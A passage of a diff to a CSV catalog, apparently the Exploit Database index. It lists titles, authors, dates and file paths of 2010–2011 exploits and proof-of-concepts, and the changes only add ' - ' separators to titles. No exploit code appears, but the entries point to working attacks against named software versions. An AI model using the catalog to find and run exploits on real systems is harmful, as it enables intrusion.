String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 @@ -12663,7 +12663,7 @@ id,file,description,date,author,platform,type,port 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng <= 1.4.2 - Denial of Service Vulnerability",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa SQL Injection Vulnerability",2010-07-20,"ALTBTA ",php,webapps,0 -14424,platforms/windows/dos/14424.txt,"Lithtech Engine Memory Corruption Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 +14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability",2010-07-20,"HaCkEr arar",php,webapps,0 14426,platforms/php/webapps/14426.pl,"Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability",2010-07-21,Metropolis,php,webapps,0 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - CSRF Vulnerability",2010-07-21,anonymous,windows,webapps,0 @@ -12700,7 +12700,7 @@ id,file,description,date,author,platform,type,port 14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection Vulnerability",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability",2010-07-24,Craw,php,webapps,0 -14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u) File Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 +14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u File) Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection Vulnerability",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) 0.24 - SQL Injection Vulnerability",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) SQL Injection Vulnerability",2010-07-24,Forza-Dz,php,webapps,0 @@ -12773,7 +12773,7 @@ id,file,description,date,author,platform,type,port 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 -14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 +14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 @@ -12793,7 +12793,7 @@ id,file,description,date,author,platform,type,port 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 -14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 +14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 @@ -12803,7 +12803,7 @@ id,file,description,date,author,platform,type,port 14607,platforms/windows/dos/14607.py,"Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0 14608,platforms/windows/dos/14608.txt,"Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048)",2010-08-10,"Core Security",windows,dos,0 14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 -14610,platforms/windows/local/14610.txt,"Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability",2010-08-10,"Cesar Cerrudo",windows,local,0 +14610,platforms/windows/local/14610.txt,"Microsoft Windows - Tracing Registry Key ACL Privilege Escalation Vulnerability",2010-08-10,"Cesar Cerrudo",windows,local,0 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 @@ -12829,7 +12829,7 @@ id,file,description,date,author,platform,type,port 14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0 14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion Directory Traversal Vulnerability",2010-08-14,Unknown,multiple,remote,0 -14642,platforms/windows/dos/14642.txt,"Acrobat Acrobat Font Parsing Integer Overflow Vulnerability",2010-08-14,"Ramz Afzar",windows,dos,0 +14642,platforms/windows/dos/14642.txt,"Acrobat Acrobat - Font Parsing Integer Overflow Vulnerability",2010-08-14,"Ramz Afzar",windows,dos,0 14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0 14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0 @@ -12852,9 +12852,9 @@ id,file,description,date,author,platform,type,port 14671,platforms/windows/dos/14671.py,"Brazip 9.0 - (.zip) Buffer Overflow Vulnerability (SEH)",2010-08-17,ITSecTeam,windows,dos,0 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 -14674,platforms/windows/remote/14674.txt,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 +14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 -14678,platforms/php/dos/14678.zip,"PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 +14678,platforms/php/dos/14678.zip,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0 @@ -12909,7 +12909,7 @@ id,file,description,date,author,platform,type,port 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 -14748,platforms/windows/local/14748.txt,"uTorrent DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 +14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0 @@ -12921,11 +12921,11 @@ id,file,description,date,author,platform,type,port 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Versions < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 -14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14766,platforms/windows/local/14766.c,"Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service Vulnerability",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 -14769,platforms/windows/local/14769.c,"Nvidia Driver DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14772,platforms/windows/local/14772.c,"Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 @@ -13001,7 +13001,7 @@ id,file,description,date,author,platform,type,port 14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 -14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 +14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 @@ -13043,9 +13043,9 @@ id,file,description,date,author,platform,type,port 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 -14944,platforms/windows/local/14944.py,"Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 +14944,platforms/windows/local/14944.py,"Microsoft Office Visio - .DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 -14949,platforms/windows/dos/14949.py,"Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 +14949,platforms/windows/dos/14949.py,"Mozilla Firefox - XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 @@ -13151,7 +13151,7 @@ id,file,description,date,author,platform,type,port 15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 -15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 +15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80 @@ -13268,7 +13268,7 @@ id,file,description,date,author,platform,type,port 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 -15241,platforms/windows/remote/15241.txt,"Oracle Java 6 OBJECT tag ""launchjnlp""/""docbase"" Param Buffer Overflow Exploit",2010-10-13,Skylined,windows,remote,0 +15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag ""launchjnlp""/""docbase"" Param Buffer Overflow Exploit",2010-10-13,Skylined,windows,remote,0 15242,platforms/windows/dos/15242.html,"Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 @@ -13284,7 +13284,7 @@ id,file,description,date,author,platform,type,port 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload Vulnerability",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 -15259,platforms/windows/dos/15259.txt,"DATAC RealWin <= 2.0 (Build 6.1.8.10) Buffer Overflow Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 +15259,platforms/windows/dos/15259.txt,"DATAC RealWin <= 2.0 (Build 6.1.8.10) - Buffer Overflow Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 - Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB <= 6.5.0.3 - Denial of Service Vulnerability",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 @@ -13348,7 +13348,7 @@ id,file,description,date,author,platform,type,port 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 -15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 +15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 15342,platforms/multiple/dos/15342.html,"Firefox Memory Corruption Proof of Concept (Simplified)",2010-10-28,extraexploit,multiple,dos,0 @@ -13402,7 +13402,7 @@ id,file,description,date,author,platform,type,port 15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow Vulnerability (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download Vulnerability",2010-11-03,v1R00Z,php,webapps,0 15405,platforms/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection Vulnerability",2010-11-03,Silic0n,php,webapps,0 -15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 +15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite - NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h Local File Inclusion Vulnerability",2010-11-03,"Salvatore Fresta",php,webapps,0 15412,platforms/php/webapps/15412.txt,"eocms 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 @@ -13433,7 +13433,7 @@ id,file,description,date,author,platform,type,port 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0 -15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 +15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 @@ -13777,8 +13777,8 @@ id,file,description,date,author,platform,type,port 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 -15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0 -15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 +15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0 +15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 @@ -13839,7 +13839,7 @@ id,file,description,date,author,platform,type,port 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - CSRF Vulnerability",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 -15973,platforms/multiple/dos/15973.txt,"Wireshark ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 +15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument Local Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -14010,7 +14010,7 @@ id,file,description,date,author,platform,type,port 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 - TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",linux,dos,0 -16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 +16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0 16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 @@ -14394,7 +14394,7 @@ id,file,description,date,author,platform,type,port 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 -16594,platforms/windows/remote/16594.rb,"Adobe Shockwave rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 +16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 16597,platforms/windows/remote/16597.rb,"Internet Explorer VML Fill Method Code Execution",2010-07-03,metasploit,windows,remote,0 @@ -14813,7 +14813,7 @@ id,file,description,date,author,platform,type,port 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17024,platforms/windows/remote/17024.txt,"7-technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 -17025,platforms/windows/dos/17025.txt,"DATAC RealWin Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 +17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player AVM Bytecode Verification",2011-03-23,metasploit,windows,remote,0 17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,metasploit,windows,remote,0 @@ -14922,7 +14922,7 @@ id,file,description,date,author,platform,type,port 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi Vulnerability",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & 